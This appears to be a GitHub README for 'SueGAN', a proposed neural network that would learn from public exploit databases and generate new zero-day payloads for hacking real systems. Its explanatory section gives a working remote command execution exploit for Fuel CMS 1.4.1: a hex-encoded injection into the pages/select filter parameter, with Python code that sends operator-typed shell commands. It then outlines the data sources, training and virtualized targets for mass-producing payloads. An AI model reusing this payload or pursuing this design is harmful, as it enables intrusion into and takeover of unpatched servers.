SueGAN-AI-to-generate-exploit-codes

Is it possible for the AI (GAN Generative Adversarial Network) to generate exploit hack codes automatically?

Objective create SueGAN

I have been doing the courses https://tryhackme.com/ They are good, I recommend them, but you are not going to hack any real environment with it. (Nobody will going to enter any website where the system's workers know how to press the update button). We have extensive experience with neural networks.

To hack real environments you need to find a zero-day exploit, you can obtain:

Through a honeypot: create a vulnerable artificial environment and have a MASTER hacker appear, attack you, collect the attack code there, and take day 0)
Know a lot and fabricate the vulnerability (Everybody will die doing reverse engineering at a low level, before finding it)

Can you feed a TensorFlow GAN with known previous exploit codes and have the GAN end up generating day 0 exploits?

Note: In this project the word AI will not be used again, it is a marketing word, when programming IT MEANS NOTHING, every time a programmer says AI instead of Reinforcement Learning, Tensor Flow,pytorch o Decision Tree, a kitten dies XD

What is a GAN neural network?

Una GAN (Deep Convolutional Generative Adversarial Network) Two models are trained simultaneously by an adversarial process. Generator ("the artist") learns to create images that look real, while Discriminator ("the art critic") learns to differentiate real images from fake ones. More info: https://www.tensorflow.org/tutorials/generative/dcgan

Example of how the GAN is fed with anime faces (an image matrix 360 width, 360 length, 3 colors) why not an n x n dimensional exploit matrix? and after several turns it ends up generating images of “invented” animes, that is, those that have not been made by any human.

Code example GANs anime

For more details on GAN technology

Example of creation images of a hybrid animal between: horses and zebras

Remember that although the examples are with images, an image (an image matrix 360 width, 360 length, 3 colors) and a python code (a tokenized matrix N tokens, for N code files) for the GAN is the same a data array. It is true that to take the form of a GAN-matrix, an image has a different treatment than a text in German and a python code. Reinforcement Learning could also do it, but it does not reach the creativity levels of the GAN.

¿What is an exploit ?

It is a code or set of codes that allows you to take advantage of an “extra function” of the attacked server. Attacked server is not aware that this extra function was randomly created during the development of the server.

Here we can see a good example of exploit https://www.exploit-db.com/exploits/50477 On servers with the Fuel CMS v1.4.1 library https://www.getfuelcms.com/

If a search request is made http.serveratack.com/fuel/pages/select/?filter
The payload is added behind %27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b %24%61%28%27
After the payload a cmd command console code, for example simply list the files on the server dir /l
It ends with the concatenation of the payload %27%29%2b%27, the server will return the list of files, and any other cmd instructions, the machine is totally hacked.

The python code looks like this:

cmd = input(Style.BRIGHT+Fore.YELLOW+"Enter Command $"+Style.RESET\_ALL)   
main\_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+quote(cmd)+"%27%29%2b%27"
r = requests.get(main\_url)

From this explanation and this link https://www.exploit-db.com/exploits/50477 The Sweet is the Payload, the rest of the code is auxiliary python, in fact it is perfectly executable in java or c#. The main idea is create a GAN to find Payloads.

Where does the data set come from?

To create AI images of horses that look like zebras we need a large dataset of images of zebras and horses.

To create the payload you need to collect all the python exploits (in the first versions only python will be used, keep in mind that the languages will be expanded). 98% of known exploits are found on these sites:

https://www.exploit-db.com/ OWASP exploit database It represents a broad consensus about the most critical security risks to web application
https://nvd.nist.gov/vuln/full-listing USA National Vulnerability Database
https://www.tenable.com/products/nessus Free or pay version
https://www.rapid7.com/db Vulnerability & Exploit Database (use in Metasploit https://docs.rapid7.com/metasploit/managing-the-database/ )
https://github.com/ can search GitHub by keywords such as “POC”, “vulnerability” key “cve”

Put the data into GAN

For the python exploit codes to enter the GAN, tokenization (matrix transformation) is required. Each language requires its own tokenization system, English, French... (more information on what tokenization is https://www.tensorflow.org/text/guide/tokenizers )

You can play tokenizing like chatGPT does herehttps://platform.openai.com/tokenizer

In the case of programming languages, their own tokenization mode is required. To carry out this process there are libraries and articles can help Tokenizer for Python source:

https://benjam.info/blog/posts/2019-09-18-python-deep-dive-tokenizer/ entire reading is recommended
https://docs.python.org/3/library/tokenize.html https://documentation.help/Python-3.6.8/tokenize.html
https://pypi.org/project/code-tokenize/
https://github.com/huggingface/tokenizers/tree/main?tab=readme-ov-file#bindings

Training. Generator and Discriminator

Generator ("the artist") must generate .py codes and correct them based on the weight returned by the Discriminator ("the art critic") The Discriminator should answer the question, how close is it to being a viable payload?

To really check it, a real machine would be required to attack, this environment is complex, generating about +-5000 .py with potential attacks is enough. Those have to be checked with the real machine. The Discriminator must be able to verify that the code compiles and is able to reach the target. Training should focus on creating payloads. It would help a lot to understand the steps that the programmer-hacker took to discover the exploit.

Steps Architecture:

*feel free to comment changes *

Collect .py from DDBB exploits
Inside the .py tokenize , one thing is the code and another the payload. each one has to have its own way to become matrix.
Generation of two Discriminator (art critics) these neural networks must answer the question, how close is this .py to being a viable code? and another one that answers, how close is this payload to being a viable payload? High importance to what kind of payload is https://portswigger.net/burp/documentation/desktop/tools/intruder/configure-attack/payload-types
Creation of the Generator (the artist) should generate code and randomly weighted payload with the Distriminator (like anime images but with code).
Evaluation, creation of real virtualized environments for testing the generated payloads. This tool will generate around 100000 payloads of which only one will work. The one that works XD

We are currently developing privately, if you want to join the team please contact us. https://www.linkedin.com/in/luislcastillo/

The name Sue

The name is a curious tribute to Argentina 🇦🇷 🌞. Sue Carpenter is the nurse who took Diego Maradona off the field in the 1994 USA soccer World Cup⚽ (stadio Foxboro de Massachusetts, June 25, Argentina beat Nigeria 2-1). Sue was the only person who could stop Diego, no other soccer player in history could stop him. “the tool that kills God soccer”. After that he never played again

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

SueGAN-AI-to-generate-exploit-codes

Objective create SueGAN

What is a GAN neural network?

¿What is an exploit ?

Where does the data set come from?

Put the data into GAN

Training. Generator and Discriminator

Steps Architecture:

The name Sue

Files

README.md

Latest commit

History

README.md

File metadata and controls

SueGAN-AI-to-generate-exploit-codes

Objective create SueGAN

What is a GAN neural network?

¿What is an exploit ?

Where does the data set come from?

Put the data into GAN

Training. Generator and Discriminator

Steps Architecture:

The name Sue